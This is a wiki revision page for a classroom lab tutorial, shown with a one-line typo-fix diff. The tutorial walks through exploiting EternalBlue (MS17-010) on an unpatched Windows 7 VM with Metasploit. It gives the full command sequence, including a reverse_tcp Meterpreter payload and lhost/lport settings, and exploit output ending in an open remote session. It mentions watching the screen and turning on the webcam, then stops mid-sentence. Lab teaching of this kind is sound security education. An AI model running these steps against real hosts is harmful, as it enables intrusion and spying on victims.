Difference between revisions of "EternalBlue Windows 7"

From csn
Jump to navigation Jump to search
Line 97: Line 97:
  
 
<pre>
 
<pre>
th0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
+
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
 
         inet 134.115.148.147  netmask 255.255.255.0  broadcast 134.115.148.255
 
         inet 134.115.148.147  netmask 255.255.255.0  broadcast 134.115.148.255
 
         inet6 fe80::20c:29ff:feee:61f1  prefixlen 64  scopeid 0x20<link>
 
         inet6 fe80::20c:29ff:feee:61f1  prefixlen 64  scopeid 0x20<link>

Revision as of 11:50, 30 September 2021

In this lab, we will learn how to use the EternalBlue vulnerability on an unpatched Windows 7 host. This exploit was linked to the NSA but has since been patched on all windows versions. We will use Metasploit on Kali Linux to make this process a little easier.

  • EternalBlue
  • Linux
  • Security
  • Metasploit

starting up metasploit

on the Kali VM we are going to open terminal and type the following commands:

service postgresql start
msfconsole

we are then going to use the search command to see what Modules are available:

search eternalblue

you should see something like this:

Matching Modules
================

   Name                                           Disclosure Date  Rank     Check  Description
   ----                                           ---------------  ----     -----  -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Getting the IP address of your Windows 7 Machine

you will need to open command prompt and type:

ipconfig

we are looking for an ip address that looks like this 134.115.148.xxx (xxx being the last numbers)

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::2121:c64f:633e:44de%12
   IPv4 Address. . . . . . . . . . . : 134.115.148.139
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::a68c:dbff:fe6e:ef01%12
                                       134.115.148.1

in this example you can see the ip address is 134.115.148.139

setting the target to attack in metasploit

in kali linux we now need to set the host to attack (the windows machine)

set rhosts 134.115.148.xxx

this will be the ip address you got earlier, it should output this:

rhosts => 134.115.148.xxx

we will now set the payload (the software will will infect the windows 7 machine with) this software will allow us to control the machine remotely

set payload windows/x64/meterpreter/reverse_tcp

you should get this output:

payload => windows/x64/meterpreter/reverse_tcp

we now need to tell metasploit the ip address of our kali linux machine.

getting the ip address in kali linux

open a new terminal window and type this command to get the ip address:


ifconfig

we are looking for an ip address that looks like this 134.115.148.xxx (xxx being the last numbers)

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 134.115.148.147  netmask 255.255.255.0  broadcast 134.115.148.255
        inet6 fe80::20c:29ff:feee:61f1  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:ee:61:f1  txqueuelen 1000  (Ethernet)
        RX packets 4  bytes 1368 (1.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 19  bytes 2528 (2.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

in this example you can see the ip address is 134.115.148.147

setting the local ip in metasploit

in the terminal window on the kali machine type:

set lhost 134.115.148.xxx

you should get this output:

lhost => 134.115.148.xxx

then set the port:

set lport 4321

you should get this output:

lport => 4321

running the exploit and controlling the windows 7 machine

we are now going to run this exploit and can test out things like watching the screen or turning the webcam on remotely.

in the kali terminal run the exploit:

run

you should get this output:

[*] Started reverse TCP handler on 134.115.148.xxx:4321
[*] 134.115.148.xxx:445 - Connecting to target for exploitation.
[+] 134.115.148.xxx:445 - Connection established for exploitation.
[+] 134.115.148.xxx:445 - Target OS selected valid for OS indicated by SMB reply
[*] 134.115.148.xxx:445 - CORE raw buffer dump (51 bytes)
[*] 134.115.148.xxx:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 134.115.148.xxx:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 134.115.148.xxx:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 134.115.148.xxx:445 - 0x00000030  6b 20 31                                         k 1
[+] 134.115.148.xxx:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 134.115.148.xxx:445 - Trying exploit with 12 Groom Allocations.
[*] 134.115.148.xxx:445 - Sending all but last fragment of exploit packet
[*] 134.115.148.xxx:445 - Starting non-paged pool grooming
[+] 134.115.148.xxx:445 - Sending SMBv2 buffers
[+] 134.115.148.xxx:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 134.115.148.xxx:445 - Sending final SMBv2 buffers.
[*] 134.115.148.xxx:445 - Sending last fragment of exploit packet!
[*] 134.115.148.xxx:445 - Receiving response from exploit packet
[+] 134.115.148.xxx:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 134.115.148.xxx:445 - Sending egg to corrupted connection.
[*] 134.115.148.xxx:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 134.115.148.xxx
[*] Meterpreter session 1 opened (134.115.148.xxx:4321 -> 134.115.148.xxx:49207) at 2019-03-26 11:01:46 -0500
[+] 134.115.148.xxx:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 134.115.148.xxx:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 134.115.148.xxx:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

we now have control of the machine and you can try out some commands such as: